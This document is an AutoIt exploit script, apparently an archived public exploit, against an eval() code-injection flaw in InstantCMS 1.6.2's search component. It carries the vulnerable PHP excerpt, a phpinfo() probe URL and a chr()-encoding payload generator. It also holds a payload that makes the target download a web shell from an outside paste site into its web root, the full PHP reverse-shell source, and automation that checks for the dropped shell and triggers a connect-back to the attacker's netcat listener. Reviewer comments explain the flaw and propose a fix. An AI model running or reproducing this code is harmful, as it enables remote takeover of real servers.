`#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=exploit.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Inet.au3>
#include <String.au3>
#cs
Demo vid: http://youtu.be/j_RIPh-nYpY
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip
Or:
http://www.instantcms.ru/download.html
Dork: InstantCMS © 2007-2010
In the wild I also found 1.7 installs that are vulnerable in the same way.
<?php
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php
/*********************************************************************************************/
// //
// InstantCMS v1.6 (c) 2010 FREEWARE //
// http://www.instantcms.ru/, [email protected] //
// //
// written by Vladimir E. Obukhov, 2007-2010 //
// //
/*********************************************************************************************/
// SNIP//
// Excerpt of the vulnerable search handler. $query, $look and $mode are request
// parameters and $against is the search expression assembled from $query; all of
// that happens above this excerpt (not shown), and none of it is escaped before
// reaching the eval() below. Note that '\"' is single-quoted, so phrase mode wraps
// the query in a literal backslash-quote, i.e. an escaped quote inside the
// double-quoted string that eval() later parses.
if ($look == 'phrase'){
$against .= '\"'.$query.'\"';
}
//RUN SEARCH PROCESSORS
//get list of components and look for search processor in component folder
$sql = "SELECT link FROM cms_components";
$rs = $inDB->query($sql) ;
if ($inDB->num_rows($rs)){
while ($component = $inDB->fetch_assoc($rs)){
// $component['link'] comes from the cms_components table (lower trust than the request,
// but still unvalidated) and is spliced into both the include path and the function name.
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';
if (file_exists($spfile)){
if (in_array($component['link'], $cfg['comp'])){
include $spfile;
// VULNERABLE: the call is built as source text and handed to eval(). $against, $look and
// $mode land inside a double-quoted string literal of that source, so a request value
// containing a ${...} sequence is interpreted by PHP rather than passed as data (the
// author's payload below relies on exactly this). Fix: never build code from request
// data -- call the processor as a callable, e.g.
//   $fn = 'search_' . $component['link'];
//   if (function_exists($fn)) { $fn($against, $look, $mode); }
// and restrict $component['link'] to [A-Za-z0-9_] before using it as a path or name.
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
}
}
}
}
// EOF SNIP //
// EOF SNIP //
Note the eval() construction: $against (built from the user-supplied $query), $look and $mode are concatenated, unescaped, into a double-quoted string inside the source text that eval() runs. PHP interprets a ${...} sequence inside a double-quoted string, so a query carrying such a sequence is executed as PHP instead of being searched for; the author reports that the payload below works as shown (demo video linked above).
Exploitation:
Payload: ${echo phpinfo()}
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords
Dropping a shell is equally straightforward (see below).
=======================================================================================
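<?php
/*
Simple payload generator: turns a string into a chain of chr() calls so that
the exploit URL carries no quotes, dots or slashes that the target (or an
intermediate filter) might mangle. It produced the two arguments of the
file_put_contents() payload below: the local path to write and the shell URL.
*/

/**
 * Encode $s as a dot-joined chain of chr() calls, e.g. "ab" -> "chr(97).chr(98)".
 *
 * The result is a PHP expression that evaluates back to $s byte for byte.
 * An empty input yields an empty string. Untyped on purpose so it runs on the
 * PHP versions of the era this advisory targets.
 *
 * @param string $s bytes to encode
 * @return string PHP expression made of chr() calls
 */
function chr_encode($s)
{
    $parts = array();
    $len = strlen($s);
    for ($i = 0; $i < $len; $i++) {
        $parts[] = 'chr(' . ord($s[$i]) . ')';
    }
    // implode() supplies the separators, so the last element needs no special case.
    return implode('.', $parts);
}

// URL of your shell. Serve it from a host you control; do not rely on a public
// paste site, whose content can change or vanish under you.
$str = 'http://search.tld/andfind.txt';
echo '<pre>' . PHP_EOL;
echo chr_encode($str);
?>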
=======================================================================================
Then drop it with the payload below, where PAYLOAD1 is the chr()-encoded path to write (relative to the web root) and PAYLOAD2 the chr()-encoded URL of your shell. Because file_get_contents() fetches the shell over HTTP, this requires allow_url_fopen to be enabled on the target:
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}
The reverse shell it drops is the following (the exploit below writes it to includes/a.php):
<?php
// Reverse-shell stager as dropped onto the target. What it does, for anyone writing
// detections: it connects back to the address the web server saw the request come from,
// on a port smuggled in the User-Agent header, and then runs every line it receives as a
// shell command. Errors and notices are hidden and the script never times out.
error_reporting(0);
set_time_limit(0);
// Connect-back target is REMOTE_ADDR, i.e. whatever address the server sees (a proxy or
// NAT in front of the operator changes where the shell calls back to).
$ip=trim((string)$_SERVER['REMOTE_ADDR']);
// The port is every digit found in the User-Agent, concatenated. Any visitor whose
// browser UA contains digits (most do) therefore triggers a connect-back attempt to
// their own address on a garbage port.
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);
// No digits at all: emit the marker and stop. The exploit below sends a digit-free
// User-Agent and greps for this marker to confirm the drop succeeded.
if (empty($port)){ die('<!-- Welcome BH -->');}
// Return values of socket_create()/socket_connect() are never checked; on failure the
// writes below just fail silently under error_reporting(0).
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);
// $hello is appended to before ever being assigned (E_NOTICE, suppressed above).
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));
// Each chunk read from the socket is executed verbatim through the backtick
// (shell_exec) operator and its output sent back with a 'W00T: ' prompt.
while($alive=@socket_read($socket, 31337))
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);
#ce
; Usage text shown when the argument count is wrong (see the $CmdLine check below).
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF
; User-Agent for the probe, drop and verify requests. It deliberately contains NO digits:
; the dropped shell (PHP above) takes its connect-back port from the digits of the
; User-Agent and prints the '<!-- Welcome BH -->' marker when there are none, which is
; what the "does the shell exist?" check below looks for.
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';
; Vulnerable endpoint; 'Shoutz)' is a placeholder that StringReplace() swaps for a payload.
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';
; chr()-encoded payload; it decodes to
;   file_put_contents('includes/a.php', file_get_contents('http://www.heypasteit.com/download/0V18'))
; so the TARGET fetches the shell body from a third-party paste site that the operator
; does not control and writes whatever that URL serves at run time into its web root.
; If the paste is gone or replaced, the drop silently fails (or installs someone else's
; code). Host the shell yourself and re-encode the URL with the generator above. The
; fetch also requires allow_url_fopen to be enabled on the target.
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';
; Marker the dropped shell prints when the request carries no port (no digits in the UA).
$pissagainst_wind='<!-- Welcome BH -->';
; Console separator line.
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
#cs
Debug helper: print the probe URL instead of sending it.
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));
exit;
#ce
ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _
'# *Via Reverse Shell* #' & @CRLF & _
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _
'# /AkaStep #' & $triptrop)
; Exactly two arguments: target base URL and the listener port.
if $CmdLine[0] <> 2 Then
;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
; NOTE(review): this is a console build (Change2CUI=y) but usage is reported through a
; blocking GUI MsgBox; the commented-out ConsoleWrite above is the CLI-friendly variant.
MsgBox(64,"",$msg_usage);
exit;
EndIf
$rsite=$CmdLine[1];
$PayloadUA=$CmdLine[2];
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop);
HttpSetUserAgent($fakeua);
; Probe: inject ${echo phpinfo()} and look for a string phpinfo() output contains.
; Caveats: (1) if phpinfo() is in disable_functions the probe says "not vulnerable" even
; though eval() is still reachable; (2) 'allow_url_fopen' appears in phpinfo() output as a
; directive name whether it is On or Off, so this does not confirm the setting the later
; file_get_contents(<url>) drop depends on. The payload is concatenated into the URL
; unencoded (spaces, '$', '{', '(' ...); presumably the HTTP layer and server tolerate
; that, as the author's demo suggests -- verify this first if the probe fails.
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);
if StringInStr($isvulnerable,'allow_url_fopen') Then
ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop);
Else
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop);
exit;
EndIf
#cs
Getting the reverse shell, in three steps:
1. drop the shell as includes/a.php (the $kissyou payload, decoded in its comment above);
2. request includes/a.php with the digit-free UA and check for the marker;
3. request it again with the listener port as the UA to trigger the connect-back.
Step 1 as a raw query string, for manual use:
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords
#ce
#cs
EXPLOITING!
#ce
HttpSetUserAgent($fakeua)
; Fire the drop. InetGet's return value is not checked, hence the existence check below.
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)
sleep(Random(1500,3000,1));// random pause of a few seconds so the remote write has time to land
#cs
Now checking for existence of our dropped shell.
#ce
HttpSetUserAgent($fakeua)
; With the digit-free UA a live shell answers with the marker only (die() before any socket work).
$dont=_INetGetSource($rsite & '/includes/a.php',True)
if StringInStr($dont,$pissagainst_wind) Then
ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)
Else
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop);
exit;
EndIf
#cs
And Finally Getting Reverse Shell
#ce
; The port travels purely as the digits of the User-Agent, so $PayloadUA must be the bare
; port number (any other digit in it corrupts the port). The shell connects to REMOTE_ADDR,
; the address the target sees, so the listener must be on the same public IP this script
; runs from (no NAT or proxy in between). The trailing 1 is InetGet's background flag,
; presumably so this returns while the shell keeps the connection open.
HttpSetUserAgent($PayloadUA)
InetGet($rsite & '/includes/a.php','',1,1)
ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop);
exit;
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
================================================
/AkaStep
#ce